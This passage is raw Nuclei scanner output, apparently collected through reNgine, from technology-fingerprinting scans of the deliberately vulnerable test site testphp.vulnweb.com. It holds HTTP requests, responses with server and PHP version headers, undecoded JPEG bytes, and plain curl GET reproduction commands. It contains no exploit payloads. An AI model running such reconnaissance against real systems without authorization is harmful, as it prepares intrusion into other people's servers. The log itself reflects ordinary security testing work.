'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:58 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:59.076983363Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:58 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:59.291632864Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:56 GMT\\r\\nLocation: http://testphp.vulnweb.com/hpp/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:59.336889558Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:59 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:59.584035278Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:00 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd 